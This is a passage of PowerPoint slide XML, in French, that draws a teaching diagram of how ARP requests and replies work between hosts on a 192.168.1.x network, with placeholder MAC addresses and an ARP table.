                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> B</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>bbbb:bbbb:bbbb</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="19" name="Tableau 18"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="842091658"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6232733" y="1619159"/>
          <a:ext cx="2798894" cy="944546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="325554">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> C</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.3</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur droit 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="0"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5665980" y="2800264"/>
            <a:ext cx="646" cy="909328"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connecteur droit 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6108195" y="3876699"/>
            <a:ext cx="3839991" cy="1660"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connecteur droit 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1914986" y="3876699"/>
            <a:ext cx="3308778" cy="1196"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118291" y="805753"/>
            <a:ext cx="5142883" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pincipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Connecteur droit avec flèche 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961842" y="3709592"/>
            <a:ext cx="330877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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28" name="Tableau 27"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996071400"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2167027" y="3098615"/>
          <a:ext cx="2465658" cy="518160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{7DF18680-E054-41AD-8BC1-D1AEF772440D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2465658"/>
              </a:tblGrid>
              <a:tr h="309251">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>ARP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Who</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> has 192.168.1.2 ?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Connecteur droit avec flèche 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6347195" y="3718775"/>
            <a:ext cx="330877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1" name="Connecteur droit avec flèche 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5845996" y="2876765"/>
            <a:ext cx="1" cy="72165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Connecteur droit avec flèche 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6347195" y="4022036"/>
            <a:ext cx="329396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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="38" name="Tableau 37"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3714034763"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6472719" y="4141403"/>
          <a:ext cx="2743200" cy="518160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{93296810-A885-4BE3-A3E7-6D5BEEA58F35}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2743200"/>
              </a:tblGrid>
              <a:tr h="309251">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>ARP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>reply</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>at</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>bbbb:bbbb:bbbb</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connecteur droit avec flèche 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1914986" y="3990238"/>
            <a:ext cx="329396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2" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="5494338"/>
            <a:ext cx="28067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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5500688"/>
            <a:ext cx="27876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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5810251"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="5810251"/>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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="6119813"/>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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="6119813"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="6429376"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="6429376"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="5803901"/>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1" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="5810251"/>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2" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="6119813"/>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3" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="6429376"/>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4" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5494338"/>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5" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2913063" y="5494338"/>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6" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="5500688"/>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7" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="6738938"/>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8" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1063626" y="5548313"/>
            <a:ext cx="10175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ARP TABLE A</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59" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="217488" y="5853113"/>
            <a:ext cx="474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MAC</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60" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733551" y="5853113"/>
            <a:ext cx="2460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61" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="217488" y="6162676"/>
            <a:ext cx="12311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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bbbb:bbbb:bbbb</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733551" y="6162676"/>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B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="5423533"/>
            <a:ext cx="28067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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="5429883"/>
            <a:ext cx="27876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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="5739446"/>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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="5739446"/>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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="6049008"/>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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="6049008"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="6358571"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="6358571"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="5733096"/>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3" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="5739446"/>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4" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="6049008"/>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5" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="6358571"/>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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="5423533"/>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7" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12115754" y="5423533"/>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8" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="5429883"/>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9" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="6668133"/>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0" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10266317" y="5477508"/>
            <a:ext cx="10175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ARP TABLE A</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81" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9420179" y="5782308"/>
            <a:ext cx="474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MAC</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82" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10936242" y="5782308"/>
